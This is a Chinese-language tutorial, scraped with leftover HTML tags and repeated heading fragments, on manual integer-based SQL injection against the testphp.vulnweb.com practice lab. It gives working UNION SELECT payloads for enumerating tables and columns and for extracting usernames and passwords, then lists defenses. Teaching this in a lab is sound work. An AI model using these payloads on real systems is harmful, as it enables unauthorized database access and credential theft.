基于整数的手动SQL注入技术详解<\/h1>

一、SQL注入基础概念<\/h2>
SQL注入是一种通过在应用程序的输入字段中插入恶意SQL代码来攻击数据库的技术。基于整型的SQL注入特指针对使用整数参数的查询进行注入攻击。<\/p>

二、环境准备<\/h2>

练习环境<\/strong>：使用提供的线上实验室(testphp.vulnweb.com)进行练习<\/li>

目标URL<\/strong>：testphp.vulnweb.com\/artists.php?artist=1<\/code><\/li> <\/ol> 三、漏洞检测步骤<\/h2> 第一步：识别注入点<\/h3> 访问目标URL：testphp.vulnweb.com\/artists.php?artist=1<\/code><\/li> 在参数后添加单引号测试：artist=1'<\/code> 观察是否返回数据库错误信息<\/li> 如果没有明显错误，可能仍存在注入漏洞<\/li> <\/ul> <\/li> 移除单引号恢复原始查询<\/li> <\/ol> 第二步：确定列数<\/h3> 使用ORDER BY<\/code>子句确定表中的列数：<\/p> 尝试ORDER BY 4<\/code>：artist=1 ORDER BY 4--<\/code> 如果返回错误，说明列数少于4<\/li> <\/ul> <\/li> 尝试ORDER BY 3<\/code>：artist=1 ORDER BY 3--<\/code> 如果没有错误，说明表有3列<\/li> 继续测试直到找到不报错的最大数字<\/li> <\/ul> <\/li> <\/ol> 四、信息收集技术<\/h2> 第三步：获取数据库信息<\/h3> 使用UNION SELECT<\/code>语句获取数据库信息：<\/p> 构造查询：artist=-1 UNION SELECT 1,database(),version()--<\/code> database()<\/code>函数返回当前数据库名<\/li> version()<\/code>函数返回数据库版本<\/li> <\/ul> <\/li> 示例结果：数据库名：acuart<\/li> 版本：5.1.73-0ubuntu0.10.04.1<\/li> <\/ul> <\/li> <\/ol> 第四步：枚举数据库表<\/h3> 使用information_schema<\/code>和GROUP_CONCAT()<\/code>枚举所有表：<\/p> 构造查询： artist=-<\/span>1<\/span> UNION<\/span> SELECT<\/span> 1<\/span>,GROUP_CONCAT(table_name<\/span>),3<\/span> FROM<\/span> information_schema.tables WHERE<\/span> table_schema=<\/span>database<\/span>()-- <\/span><\/span><\/span><\/code><\/pre><\/li> 示例结果：carts, categ, featured, guestbook, pictures, products, users<\/li> <\/ol> 第五步：枚举表结构<\/h3> 获取特定表(如users)的列信息：<\/p> 构造查询： artist=-<\/span>1<\/span> UNION<\/span> SELECT<\/span> 1<\/span>,GROUP_CONCAT(column_name<\/span>),3<\/span> FROM<\/span> information_schema.columns WHERE<\/span> table_name<\/span>=<\/span>'users'<\/span>-- <\/span><\/span><\/span><\/code><\/pre><\/li> 示例结果：uname, pass, cc, address, email, name, phone, cart<\/li> <\/ol> 五、数据提取技术<\/h2> 第六步：提取敏感数据<\/h3> 从users表中提取用户名和密码：<\/p> 构造查询： artist=-<\/span>1<\/span> UNION<\/span> SELECT<\/span> 1<\/span>,GROUP_CONCAT(uname,':'<\/span>,pass),3<\/span> FROM<\/span> users-- <\/span><\/span><\/span><\/code><\/pre><\/li> 示例结果：test:test<\/li> <\/ol> 六、高级技巧<\/h2> 可以进一步提取其他列数据： address, email, name, phone, cart等<\/li> <\/ul> <\/li> 使用CONCAT_WS<\/code>格式化输出： artist=-<\/span>1<\/span> UNION<\/span> SELECT<\/span> 1<\/span>,CONCAT_WS(':'<\/span>,uname,pass,email),3<\/span> FROM<\/span> users-- <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 七、防御措施<\/h2> 虽然本文教授攻击技术，但开发者应了解如何防御：<\/p> 使用参数化查询(预处理语句)<\/li> 实施输入验证<\/li> 最小权限原则<\/li> 错误处理不暴露详细信息<\/li> <\/ol> 八、注意事项<\/h2> 仅用于授权测试<\/li> 实际环境中可能遇到WAF等防护措施<\/li> 不同数据库语法可能有差异<\/li> 练习时使用授权环境<\/li> <\/ol> 通过以上步骤，可以系统地学习基于整型的手动SQL注入技术。建议在合法授权环境下多加练习，以深入理解其原理和防御方法。<\/p>

基于整数的手动SQL注入技术详解<\/h1>

一、SQL注入基础概念<\/h2> SQL注入是一种通过在应用程序的输入字段中插入恶意SQL代码来攻击数据库的技术。基于整型的SQL注入特指针对使用整数参数的查询进行注入攻击。<\/p>

三、漏洞检测步骤<\/h2>

四、信息收集技术<\/h2>

五、数据提取技术<\/h2>

一、SQL注入基础概念<\/h2>
SQL注入是一种通过在应用程序的输入字段中插入恶意SQL代码来攻击数据库的技术。基于整型的SQL注入特指针对使用整数参数的查询进行注入攻击。<\/p>